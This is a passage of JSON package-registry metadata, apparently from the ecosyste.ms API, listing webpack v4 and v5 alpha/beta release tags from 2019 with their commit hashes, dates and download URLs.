r.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.